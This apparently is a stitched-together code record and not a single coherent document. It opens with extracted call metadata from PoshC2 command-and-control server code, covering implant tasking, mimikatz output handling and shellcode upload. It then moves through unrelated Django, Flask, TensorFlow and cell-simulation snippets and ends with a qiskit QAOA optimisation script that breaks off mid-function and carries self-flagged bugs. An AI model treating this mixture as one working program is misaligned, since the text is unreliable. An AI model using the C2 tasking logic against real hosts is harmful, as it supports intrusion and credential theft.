'poshc2.server.Core.decrypt_bytes_gzip', 'decrypt_bytes_gzip', (['encKey', 'post_data[1500:]'], {}), '(encKey, post_data[1500:])\n', (1562, 1588), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, 
process_mimikatz, print_bad\n'), ((2451, 2482), 'poshc2.server.database.DB.get_cmd_from_task_id', 'DB.get_cmd_from_task_id', (['taskId'], {}), '(taskId)\n', (2474, 2482), True, 'import poshc2.server.database.DB as DB\n'), ((2512, 2537), 'poshc2.server.database.DB.get_task_owner', 'DB.get_task_owner', (['taskId'], {}), '(taskId)\n', (2529, 2537), True, 'import poshc2.server.database.DB as DB\n'), ((3547, 3589), 're.sub', 're.sub', (['"""123456(.+?)654321"""', '""""""', 'rawoutput'], {}), "('123456(.+?)654321', '', rawoutput)\n", (3553, 3589), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((3798, 3845), 'poshc2.server.PowerStatus.translate_power_status', 'translate_power_status', (['outputParsed', 'RandomURI'], {}), '(outputParsed, RandomURI)\n', (3820, 3845), False, 'from poshc2.server.PowerStatus import translate_power_status\n'), ((4016, 4068), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', '"""Module loaded successfully"""'], {}), "(taskId, 'Module loaded successfully')\n", (4030, 4068), True, 'import poshc2.server.database.DB as DB\n'), ((34569, 34592), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (34590, 34592), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((4264, 4309), 're.search', 're.search', (['"""PBind-Connected:.*"""', 'outputParsed'], {}), "('PBind-Connected:.*', outputParsed)\n", (4273, 4309), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((14839, 14875), 'poshc2.server.database.DB.get_implantbyrandomuri', 'DB.get_implantbyrandomuri', (['RandomURI'], {}), '(RandomURI)\n', (14864, 14875), True, 'import poshc2.server.database.DB as DB\n'), ((14911, 14940), 'poshc2.server.database.DB.get_implanttype', 'DB.get_implanttype', (['RandomURI'], {}), '(RandomURI)\n', (14929, 14940), True, 'import poshc2.server.database.DB as DB\n'), ((14967, 14990), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (14988, 14990), False, 'import datetime, 
hashlib, base64, traceback, os, re\n'), ((19288, 19333), 'poshc2.server.database.DB.insert_task', 'DB.insert_task', (['RandomURI', 'user_command', 'user'], {}), '(RandomURI, user_command, user)\n', (19302, 19333), True, 'import poshc2.server.database.DB as DB\n'), ((34385, 34410), 'poshc2.server.Core.encrypt', 'encrypt', (['EncKey', 'multicmd'], {}), '(EncKey, multicmd)\n', (34392, 34410), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((34861, 34884), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (34882, 34884), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((34997, 35015), 'poshc2.server.Core.default_response', 'default_response', ([], {}), '()\n', (35013, 35015), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((5110, 5186), 'poshc2.server.database.DB.new_task', 'DB.new_task', (['"""pbind-pivot-loadmodule Stage2-Core.exe"""', '"""autoruns"""', 'RandomURI'], {}), "('pbind-pivot-loadmodule Stage2-Core.exe', 'autoruns', RandomURI)\n", (5121, 5186), True, 'import poshc2.server.database.DB as DB\n'), ((5229, 5299), 'poshc2.server.database.DB.new_task', 'DB.new_task', (['"""pbind-loadmodule Stage2-Core.exe"""', '"""autoruns"""', 'RandomURI'], {}), "('pbind-loadmodule Stage2-Core.exe', 'autoruns', RandomURI)\n", (5240, 5299), True, 'import poshc2.server.database.DB as DB\n'), ((5420, 5465), 're.search', 're.search', (['"""FComm-Connected:.*"""', 'outputParsed'], {}), "('FComm-Connected:.*', outputParsed)\n", (5429, 5465), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((6013, 6083), 'poshc2.server.database.DB.new_task', 'DB.new_task', (['"""fcomm-loadmodule Stage2-Core.exe"""', '"""autoruns"""', 'RandomURI'], {}), "('fcomm-loadmodule Stage2-Core.exe', 'autoruns', RandomURI)\n", (6024, 6083), True, 'import poshc2.server.database.DB as DB\n'), ((6231, 6268), 'poshc2.server.database.DB.update_sleep', 
'DB.update_sleep', (['new_sleep', 'RandomURI'], {}), '(new_sleep, RandomURI)\n', (6246, 6268), True, 'import poshc2.server.database.DB as DB\n'), ((21050, 21080), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (21067, 21080), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((6378, 6408), 'base64.b64decode', 'base64.b64decode', (['outputParsed'], {}), '(outputParsed)\n', (6394, 6408), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((6707, 6800), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', "('Screenshot captured: %s%s.png' % (DownloadsDirectory, filename))"], {}), "(taskId, 'Screenshot captured: %s%s.png' % (\n DownloadsDirectory, filename))\n", (6721, 6800), True, 'import poshc2.server.database.DB as DB\n'), ((7329, 7380), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', '"""Upload shellcode complete"""'], {}), "(taskId, 'Upload shellcode complete')\n", (7343, 7380), True, 'import poshc2.server.database.DB as DB\n'), ((21181, 21211), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (21198, 21211), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((21290, 21314), 'poshc2.server.Core.load_module', 'load_module', (['module_name'], {}), '(module_name)\n', (21301, 21314), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((22116, 22137), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (22135, 22137), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((6937, 7072), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', '"""Screenshot not captured, the screen could be locked or this user does not have access to the screen!"""'], {}), "(taskId,\n 'Screenshot not captured, the screen could be locked 
or this user does not have access to the screen!'\n )\n", (6951, 7072), True, 'import poshc2.server.database.DB as DB\n'), ((7743, 7794), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', '"""Upload shellcode complete"""'], {}), "(taskId, 'Upload shellcode complete')\n", (7757, 7794), True, 'import poshc2.server.database.DB as DB\n'), ((17802, 17837), 'base64.b64encode', 'base64.b64encode', (['upload_file_bytes'], {}), '(upload_file_bytes)\n', (17818, 17837), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((22978, 22999), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (22997, 22999), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((19081, 19120), 'base64.b64decode', 'base64.b64decode', (['upload_file_bytes_b64'], {}), '(upload_file_bytes_b64)\n', (19097, 19120), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((23685, 23706), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (23704, 23706), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((6492, 6503), 'poshc2.Utils.randomuri', 'randomuri', ([], {}), '()\n', (6501, 6503), False, 'from poshc2.Utils import randomuri\n'), ((11449, 11552), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', "('Download file part %s of %s to: %s' % (chunkNumber, totalChunks, filename))"], {}), "(taskId, 'Download file part %s of %s to: %s' % (chunkNumber,\n totalChunks, filename))\n", (11463, 11552), True, 'import poshc2.server.database.DB as DB\n'), ((12171, 12215), 'poshc2.server.Core.decrypt_bytes_gzip', 'decrypt_bytes_gzip', (['encKey', 'post_data[1500:]'], {}), '(encKey, post_data[1500:])\n', (12189, 12215), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((24289, 24310), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (24308, 24310), False, 'import datetime, hashlib, base64, 
traceback, os, re\n'), ((24510, 24538), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (24520, 24538), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((24713, 24743), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (24730, 24743), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((9347, 9402), 'os.path.isfile', 'os.path.isfile', (["('%s%s' % (DownloadsDirectory, filename))"], {}), "('%s%s' % (DownloadsDirectory, filename))\n", (9361, 9402), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((9470, 9525), 'os.path.isfile', 'os.path.isfile', (["('%s%s' % (DownloadsDirectory, filename))"], {}), "('%s%s' % (DownloadsDirectory, filename))\n", (9484, 9525), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((10222, 10277), 'os.path.isfile', 'os.path.isfile', (["('%s%s' % (DownloadsDirectory, filename))"], {}), "('%s%s' % (DownloadsDirectory, filename))\n", (10236, 10277), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((11929, 11985), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', "('Error downloading file %s ' % e)"], {}), "(taskId, 'Error downloading file %s ' % e)\n", (11943, 11985), True, 'import poshc2.server.database.DB as DB\n'), ((12066, 12087), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (12085, 12087), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((12320, 12353), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', 'rawoutput'], {}), '(taskId, rawoutput)\n', (12334, 12353), True, 'import poshc2.server.database.DB as DB\n'), ((13575, 13606), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', 'message'], {}), '(taskId, message)\n', (13589, 13606), True, 'import poshc2.server.database.DB as DB\n'), ((14014, 14050), 'poshc2.server.database.DB.update_task', 
'DB.update_task', (['taskId', 'outputParsed'], {}), '(taskId, outputParsed)\n', (14028, 14050), True, 'import poshc2.server.database.DB as DB\n'), ((14067, 14097), 'poshc2.server.Core.process_mimikatz', 'process_mimikatz', (['outputParsed'], {}), '(outputParsed)\n', (14083, 14097), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((14220, 14256), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', 'outputParsed'], {}), '(taskId, outputParsed)\n', (14234, 14256), True, 'import poshc2.server.database.DB as DB\n'), ((25027, 25048), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (25046, 25048), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((25259, 25287), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (25269, 25287), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((25462, 25492), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (25479, 25492), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((10013, 10068), 'os.path.isfile', 'os.path.isfile', (["('%s%s' % (DownloadsDirectory, filename))"], {}), "('%s%s' % (DownloadsDirectory, filename))\n", (10027, 10068), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((25800, 25821), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (25819, 25821), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((26140, 26168), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (26150, 26168), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((26355, 26385), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (26372, 26385), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, 
default_response\n'), ((26811, 26832), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (26830, 26832), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((27043, 27071), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (27053, 27071), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((27246, 27276), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (27263, 27276), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((27592, 27613), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (27611, 27613), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((27895, 27923), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (27905, 27923), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((28110, 28140), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (28127, 28140), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((29423, 29444), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (29442, 29444), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((28337, 28365), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (28347, 28365), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((28552, 28582), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (28569, 28582), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((28757, 28785), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (28767, 28785), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((28972, 28996), 'poshc2.server.Core.load_module', 'load_module', 
(['module_name'], {}), '(module_name)\n', (28983, 28996), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((29966, 29987), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (29985, 29987), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((30588, 30616), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (30598, 30616), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((30803, 30833), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (30820, 30833), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((32140, 32161), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (32159, 32161), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((31038, 31066), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (31048, 31066), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((31253, 31283), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (31270, 31283), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((31466, 31494), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (31476, 31494), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((31681, 31705), 'poshc2.server.Core.load_module', 'load_module', (['module_name'], {}), '(module_name)\n', (31692, 31705), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((33327, 33348), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (33346, 33348), False, 'import datetime, hashlib, base64, traceback, os, re\n')] |
from django.urls import path, re_path
from . import views
# Route table for this app: the index page at the root and the countdown view.
urlpatterns = [
    path('', views.index, name='index'),
    path('countdown/', views.countdown, name='countdown'),
    # Catch-all redirect route, intentionally disabled.
    #re_path(r'.+', views.redir, name='redir'),
]
| [
"django.urls.path"
] | [((80, 115), 'django.urls.path', 'path', (['""""""', 'views.index'], {'name': '"""index"""'}), "('', views.index, name='index')\n", (84, 115), False, 'from django.urls import path, re_path\n'), ((121, 174), 'django.urls.path', 'path', (['"""countdown/"""', 'views.countdown'], {'name': '"""countdown"""'}), "('countdown/', views.countdown, name='countdown')\n", (125, 174), False, 'from django.urls import path, re_path\n')] |
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import render_template, request
import view_base
class IndexView(view_base.ViewBase):
    """View that serves the network-topology page."""

    def __init__(self):
        super(IndexView, self).__init__()

    def run(self):
        """Render topology.html, forwarding the request's host and port.

        Assumes `request.host` contains a ':'-separated host and port —
        a bare hostname would raise a ValueError here (NOTE(review)).
        """
        hostname, portnum = request.host.split(':')
        return render_template('topology.html', host=hostname, port=portnum)
| [
"flask.render_template",
"flask.request.host.split"
] | [((819, 842), 'flask.request.host.split', 'request.host.split', (['""":"""'], {}), "(':')\n", (837, 842), False, 'from flask import render_template, request\n'), ((858, 912), 'flask.render_template', 'render_template', (['"""topology.html"""'], {'host': 'host', 'port': 'port'}), "('topology.html', host=host, port=port)\n", (873, 912), False, 'from flask import render_template, request\n')] |
import tensorflow as tf
import numpy as np
def clipped_error(x):
    """Huber loss with delta = 1.

    Quadratic (0.5 * x^2) for |x| < 1, linear (|x| - 0.5) otherwise.

    Args:
        x: a TensorFlow tensor of errors.

    Returns:
        A tensor of the same shape with the element-wise Huber loss.
    """
    # Hoist the shared sub-expressions instead of recomputing them per branch.
    abs_x = tf.abs(x)
    quadratic = 0.5 * tf.square(x)
    linear_part = abs_x - 0.5
    try:
        # tf.select only exists in TensorFlow < 1.0.
        return tf.select(abs_x < 1.0, quadratic, linear_part)
    except AttributeError:
        # BUG FIX: was a bare `except:`, which would also swallow
        # KeyboardInterrupt/SystemExit and genuine graph-construction errors.
        # Only the missing-attribute case (tf.select renamed to tf.where in
        # TF >= 1.0) should fall through.
        return tf.where(abs_x < 1.0, quadratic, linear_part)
def linear(input_, output_size, stddev=0.02, bias_start=0.0, activation_fn=None, name='linear', mask=None):
    """Affine layer: out = input_ @ W + b, optionally through activation_fn.

    Args:
        input_: 2-D tensor of shape [batch, in_dim].
        output_size: number of output units.
        stddev: std-dev of the random-normal initializer for W.
        bias_start: constant initializer value for b.
        activation_fn: optional element-wise nonlinearity.
        name: variable scope name.
        mask: unused (kept for interface compatibility).

    Returns:
        (output, W, b) — output has activation_fn applied when given.
    """
    in_dim = input_.get_shape().as_list()[1]
    with tf.variable_scope(name):
        w = tf.get_variable('Matrix', [in_dim, output_size], tf.float32,
                            tf.random_normal_initializer(stddev=stddev))
        b = tf.get_variable('bias', [output_size],
                            initializer=tf.constant_initializer(bias_start))
        out = tf.nn.bias_add(tf.matmul(input_, w), b)
        if activation_fn is None:
            return out, w, b
        return activation_fn(out), w, b
| [
"tensorflow.variable_scope",
"tensorflow.random_normal_initializer",
"tensorflow.matmul",
"tensorflow.constant_initializer",
"tensorflow.square",
"tensorflow.abs"
] | [((425, 448), 'tensorflow.variable_scope', 'tf.variable_scope', (['name'], {}), '(name)\n', (442, 448), True, 'import tensorflow as tf\n'), ((553, 596), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': 'stddev'}), '(stddev=stddev)\n', (581, 596), True, 'import tensorflow as tf\n'), ((756, 776), 'tensorflow.matmul', 'tf.matmul', (['input_', 'w'], {}), '(input_, w)\n', (765, 776), True, 'import tensorflow as tf\n'), ((118, 127), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (124, 127), True, 'import tensorflow as tf\n'), ((141, 153), 'tensorflow.square', 'tf.square', (['x'], {}), '(x)\n', (150, 153), True, 'import tensorflow as tf\n'), ((155, 164), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (161, 164), True, 'import tensorflow as tf\n'), ((689, 724), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['bias_start'], {}), '(bias_start)\n', (712, 724), True, 'import tensorflow as tf\n'), ((209, 218), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (215, 218), True, 'import tensorflow as tf\n'), ((232, 244), 'tensorflow.square', 'tf.square', (['x'], {}), '(x)\n', (241, 244), True, 'import tensorflow as tf\n'), ((246, 255), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (252, 255), True, 'import tensorflow as tf\n')] |
"""Cell parameter random initializations."""
from typing import Any, Dict
import numpy as np
from ..parameters import (
Height,
NewCellBendLowerLower,
NewCellBendLowerUpper,
NewCellBendOverallLower,
NewCellBendOverallUpper,
NewCellBendUpperLower,
NewCellBendUpperUpper,
NewCellLength1Mean,
NewCellLength1Std,
NewCellLength2Mean,
NewCellLength2Std,
NewCellLengthAbsoluteMax,
NewCellLengthAbsoluteMin,
NewCellRadiusFromCenter,
NewCellWidthAbsoluteMax,
NewCellWidthAbsoluteMin,
NewCellWidthMean,
NewCellWidthStd,
Width,
)
from ..random import RRF, enforce_bounds
RandomSequenceType = Dict[str, Any]
class RandomWidthLength:
    """Random initializations for cell width/lengths."""
    @staticmethod
    def random_sequences(sequence: RRF) -> RandomSequenceType:
        # Sanity check: both length modes must exceed the mean width, otherwise
        # the rejection filter below could stall.
        assert NewCellLength1Mean.value > NewCellWidthMean.value
        assert NewCellLength2Mean.value > NewCellWidthMean.value
        # Rejection filter: only emit (length, width) pairs where the sampled
        # length exceeds the sampled width.
        def ensure_length_greater_width(length, width):
            for inner_length, inner_width in zip(length, width):
                if inner_length > inner_width:
                    yield [inner_length, inner_width]
        return dict(
            length__width=RRF.chain(
                ensure_length_greater_width,
                # Length: draw from a 2-component (diagonal-covariance) normal
                # and pick one component uniformly via `choice`, clipped to
                # the absolute length bounds.
                length=RRF.compose(
                    lambda raw_lengths, choice: raw_lengths[choice],
                    raw_lengths=RRF.chain(
                        enforce_bounds,
                        iterator=sequence.multivariate_normal(
                            [NewCellLength1Mean.value, NewCellLength2Mean.value],
                            [
                                [NewCellLength1Std.value, 0.0],
                                [0.0, NewCellLength2Std.value],
                            ],
                        ),
                        minimum=NewCellLengthAbsoluteMin.value,
                        maximum=NewCellLengthAbsoluteMax.value,
                    ),
                    choice=sequence.integers(0, 1),
                ),
                # Width: single normal, clipped to the absolute width bounds.
                width=RRF.chain(
                    enforce_bounds,
                    iterator=sequence.normal(
                        NewCellWidthMean.value, NewCellWidthStd.value
                    ),
                    minimum=NewCellWidthAbsoluteMin.value,
                    maximum=NewCellWidthAbsoluteMax.value,
                ),
            )
        )
class RandomBentRod:
    """Random initializations for cell bent radii."""

    @staticmethod
    def random_sequences(sequence: RRF) -> RandomSequenceType:
        """Draw uniform bend parameters within the configured bounds.

        The three draws are made in a fixed order (overall, upper, lower)
        so the stateful `sequence` stream stays reproducible.
        """
        overall = sequence.uniform(
            NewCellBendOverallLower.value,
            NewCellBendOverallUpper.value,
        )
        upper = sequence.uniform(
            NewCellBendUpperLower.value, NewCellBendUpperUpper.value
        )
        lower = sequence.uniform(
            NewCellBendLowerLower.value, NewCellBendLowerUpper.value
        )
        return {
            "bend_overall": overall,
            "bend_upper": upper,
            "bend_lower": lower,
        }
class RandomPosition:
    """Random initializations for cell positions."""

    @staticmethod
    def random_sequences(sequence: RRF) -> RandomSequenceType:
        """Sample polar coordinates around the image centre and map to x/y."""

        def to_cartesian(radius, angle):
            # Convert (radius, angle) to an [x, y] pair centred in the image.
            return [
                float(radius * np.cos(angle) + Width.value / 2),
                float(radius * np.sin(angle) + Height.value / 2),
            ]

        return dict(
            position=RRF.compose(
                to_cartesian,
                radius=sequence.uniform(0, NewCellRadiusFromCenter.value),
                angle=RRF.wrap(sequence.uniform(0, 360.0), np.radians),
            )
        )
class RandomAngle:
    """Random initializations for cell angles."""

    @staticmethod
    def random_sequences(sequence: RRF) -> RandomSequenceType:
        """Uniform angle in degrees, converted to radians via RRF.wrap."""
        degrees = sequence.uniform(0, 360.0)
        return {"angle": RRF.wrap(degrees, np.radians)}
class RandomFluorescence:
    """Random initializations for fluorescences."""

    @staticmethod
    def random_sequences(sequence: RRF) -> RandomSequenceType:
        """Single-channel uniform fluorescence draw (shape (1,))."""
        return {"fluorescences": sequence.uniform(0, 360.0, (1,))}
| [
"numpy.sin",
"numpy.cos"
] | [((3328, 3341), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (3334, 3341), True, 'import numpy as np\n'), ((3397, 3410), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (3403, 3410), True, 'import numpy as np\n')] |
import qiskit
import numpy as np
import matplotlib.pyplot as plt
import json
from graph import *
# Random comment
# NOTE(review): module-level constant P is not referenced anywhere in this
# file's visible code — confirm it is unused before removing.
P =1
def makeCircuit(inbits, outbits):
    """Build a circuit whose register holds `outbits` output qubits (low
    indices) followed by `inbits` input qubits (high indices).

    Returns:
        (circuit, classical_register, input_qubits, output_qubits)
    """
    total = inbits + outbits
    qreg = qiskit.QuantumRegister(total)
    creg = qiskit.ClassicalRegister(total)
    circuit = qiskit.QuantumCircuit(qreg, creg)
    q_output = [qreg[j] for j in range(outbits)]
    q_input = [qreg[i] for i in range(outbits, total)]
    return circuit, creg, q_input, q_output
def measureInput(qc, q_input, c):
    """Measure every qubit of the q_input register into the low classical
    bits and run the circuit; returns the qiskit counts dictionary
    (bitstring -> number of shots out of 1024)."""
    for idx, qubit in enumerate(q_input):
        qc.measure(qubit, c[idx])
    job = qiskit.execute(qc, backend='local_qasm_simulator', shots=1024)
    return job.result().get_counts(qc)
def test5(qc, q_input, c):
    """Measure the input register and plot a histogram over all 2^n input
    bitstrings (missing outcomes shown as zero counts)."""
    data = measureInput(qc, q_input, c)
    n = len(q_input)
    heights = []
    xticks = []
    for i in range(2 ** n):
        label = np.binary_repr(i, width=n)
        xticks.append(label)
        # The counts keys carry two extra (output-register) bits; the
        # original only tallies keys whose output bits are "00".
        heights.append(data.get(label + "00", 0))
    plt.bar(range(2 ** n), heights)
    plt.xticks(range(2 ** n), xticks, rotation="vertical")
    plt.xlabel('Outcomes')
    plt.ylabel('Counts')
    plt.title('Measurement Histogram')
    plt.show()
def applyQAOA(gamma, beta, graph):
    """One-level (p=1) QAOA circuit for max-clique on `graph`.

    Builds the circuit, runs 1024 shots, and returns (expectation, std) of
    the clique objective over the measured input-register bitstrings.
    """
    ### INIT REGS
    qc, c, q_input, q_output = makeCircuit(graph.getNumNodes(), 1);
    # Penalty weight applied to edges absent from the graph.
    PENALTY = graph.getMaxEdges()
    ### H on every input register
    for node in q_input:
        qc.h(node)
    complement = graph.getEdgesComp();
    edges = graph.getEdges()
    ### APPLY V AND W
    ### APPLY V
    # EDGES IN THE GRAPH
    for edge in edges:
        nodeList = edge.getNodes()
        qc.cu1(-gamma, q_input[nodeList[0].name], q_input[nodeList[1].name])
    # EDGES NOT IN THE GRAPH
    for edge in complement:
        nodeList = edge.getNodes()
        qc.cu1(PENALTY*gamma, q_input[nodeList[0].name], q_input[nodeList[1].name])
    ### APPLY W
    # Mixer: H · u1(2*beta) · H on each input qubit (an X-rotation up to phase).
    for node in q_input:
        qc.h(node)
        qc.u1(2*beta, node)
        qc.h(node)
    ### Measure
    results = measureInput(qc, q_input, c)
    ### Compute the result expectation
    ### Parse the result list.
    # B/c we only care about counts associated with input register
    # we combine the counts of states with same input register bits
    # (key[1:] drops the single output-register bit from the bitstring).
    counts = dict()
    for key in results:
        if key[1:] not in counts:
            counts[key[1:]] = results[key]
        else:
            counts[key[1:]] += results[key]
    #print(counts)
    # eox  = E[objective], eox2 = E[objective^2], weighted by shot frequency.
    eox = 0
    eox2 = 0
    for val in counts:
        cliqNum = 0
        for edge in edges:
            nodeList = edge.getNodes()
            #print("Node 1:", nodeList[0].name,"Node 2:", nodeList[1].name)
            if val[nodeList[0].name] == '1' and val[nodeList[1].name] == '1':
                cliqNum += 1
        for edge in complement:
            nodeList = edge.getNodes()
            if val[nodeList[0].name] == '1' and val[nodeList[1].name] == '1':
                cliqNum -= PENALTY
        eox += counts[val]/1024 * cliqNum
        eox2 += (cliqNum**2) * counts[val]/1024
    # Sample standard deviation with Bessel's correction.
    # NOTE(review): divides by len(counts) - 1 — this fails with a
    # ZeroDivisionError if only one distinct outcome is observed.
    std = np.sqrt((len(counts)/(len(counts) -1))*(eox2 - eox**2))
    return eox, std
def optimize(graph, epsilon, eta, threshold):
    """Alternating gradient ascent over (gamma, beta) for the QAOA objective.

    Args:
        graph: graph to optimize over.
        epsilon: half-width of the central finite difference.
        eta: learning rate.
        threshold: stop once the mean of |dgamma| and |dbeta| drops below this.

    Returns:
        (gamma, beta) at termination.
    """

    def expectation(g, b):
        # BUG FIX: applyQAOA returns an (expectation, std) tuple; the original
        # subtracted the tuples directly, which raises a TypeError.
        value, _std = applyQAOA(g, b, graph)
        return value

    def grad_gamma(g, b):
        return (expectation(g + epsilon, b) - expectation(g - epsilon, b)) / (2 * epsilon)

    def grad_beta(g, b):
        # BUG FIX: the original evaluated `beta + epsilon` on BOTH sides of the
        # central difference, so dbeta was always (noise around) zero.
        return (expectation(g, b + epsilon) - expectation(g, b - epsilon)) / (2 * epsilon)

    count = 0
    gamma = 2
    beta = 2
    dgamma = grad_gamma(gamma, beta)
    dbeta = grad_beta(gamma, beta)
    flipper = True  # Alternate between maxing gamma and maxing beta
    while (abs(dgamma) + abs(dbeta)) / 2 > threshold:
        if flipper:
            # NOTE(review): the elif branch moves gamma *against* a negative
            # gradient (preserved from the original) — confirm this is intended.
            if dgamma > 0:
